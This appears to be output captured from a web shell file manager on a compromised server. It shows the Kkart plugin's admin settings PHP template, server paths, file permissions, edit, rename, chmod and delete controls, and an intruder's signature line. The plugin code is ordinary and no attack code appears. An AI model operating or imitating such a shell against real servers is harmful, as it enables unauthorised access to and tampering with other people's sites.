Submit
Path:
~
/
/
var
/
softaculous
/
sitepad
/
editor
/
site-data
/
plugins
/
kkart-pro
/
includes
/
admin
/
views
/
File Content:
html-admin-settings.php
<?php /** * Admin View: Settings * * @package Kkart */ if ( ! defined( 'ABSPATH' ) ) { exit; } $tab_exists = isset( $tabs[ $current_tab ] ) || has_action( 'kkart_sections_' . $current_tab ) || has_action( 'kkart_settings_' . $current_tab ) || has_action( 'kkart_settings_tabs_' . $current_tab ); $current_tab_label = isset( $tabs[ $current_tab ] ) ? $tabs[ $current_tab ] : ''; if ( ! $tab_exists ) { wp_safe_redirect( admin_url( 'admin.php?page=kkart-settings' ) ); exit; } ?> <div class="wrap kkart"> <?php do_action( 'kkart_before_settings_' . $current_tab ); ?> <form method="<?php echo esc_attr( apply_filters( 'kkart_settings_form_method_tab_' . $current_tab, 'post' ) ); ?>" id="mainform" action="" enctype="multipart/form-data"> <nav class="nav-tab-wrapper kkart-nav-tab-wrapper"> <?php foreach ( $tabs as $slug => $label ) { echo '<a href="' . esc_html( admin_url( 'admin.php?page=kkart-settings&tab=' . esc_attr( $slug ) ) ) . '" class="nav-tab ' . ( $current_tab === $slug ? 'nav-tab-active' : '' ) . '">' . esc_html( $label ) . '</a>'; } do_action( 'kkart_settings_tabs' ); ?> </nav> <h1 class="screen-reader-text"><?php echo esc_html( $current_tab_label ); ?></h1> <?php do_action( 'kkart_sections_' . $current_tab ); self::show_messages(); do_action( 'kkart_settings_' . $current_tab ); do_action( 'kkart_settings_tabs_' . $current_tab ); // @deprecated 3.4.0 hook. ?> <p class="submit"> <?php if ( empty( $GLOBALS['hide_save_button'] ) ) : ?> <button name="save" class="button-primary kkart-save-button" type="submit" value="<?php esc_attr_e( 'Save changes', 'kkart' ); ?>"><?php esc_html_e( 'Save changes', 'kkart' ); ?></button> <?php endif; ?> <?php wp_nonce_field( 'kkart-settings' ); ?> </p> </form> <?php do_action( 'kkart_after_settings_' . $current_tab ); ?> </div>
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
html-admin-page-addons.php
5978 bytes
0644
html-admin-page-product-export.php
3892 bytes
0644
html-admin-page-reports.php
1780 bytes
0644
html-admin-page-status-logs-db.php
784 bytes
0644
html-admin-page-status-logs.php
1860 bytes
0644
html-admin-page-status-report.php
47722 bytes
0644
html-admin-page-status-tools.php
945 bytes
0644
html-admin-page-status.php
1251 bytes
0644
html-admin-settings.php
1873 bytes
0644
html-bulk-edit-product.php
11017 bytes
0644
html-email-template-preview.php
1052 bytes
0644
html-notice-base-table-missing.php
1555 bytes
0644
html-notice-custom.php
434 bytes
0644
html-notice-install.php
708 bytes
0644
html-notice-legacy-shipping.php
1624 bytes
0644
html-notice-maxmind-license-key.php
1148 bytes
0644
html-notice-no-shipping-methods.php
1263 bytes
0644
html-notice-redirect-only-download.php
1156 bytes
0644
html-notice-regenerating-lookup-table.php
1156 bytes
0644
html-notice-regenerating-thumbnails.php
594 bytes
0644
html-notice-secure-connection.php
817 bytes
0644
html-notice-template-check.php
1632 bytes
0644
html-notice-update.php
1317 bytes
0644
html-notice-updated.php
615 bytes
0644
html-notice-updating.php
1091 bytes
0644
html-notice-uploads-directory-is-unprotected.php
1010 bytes
0644
html-notice-wp-php-minimum-requirements.php
899 bytes
0644
html-quick-edit-product.php
7590 bytes
0644
html-report-by-date.php
4170 bytes
0644
N4ST4R_ID | Naxtarrr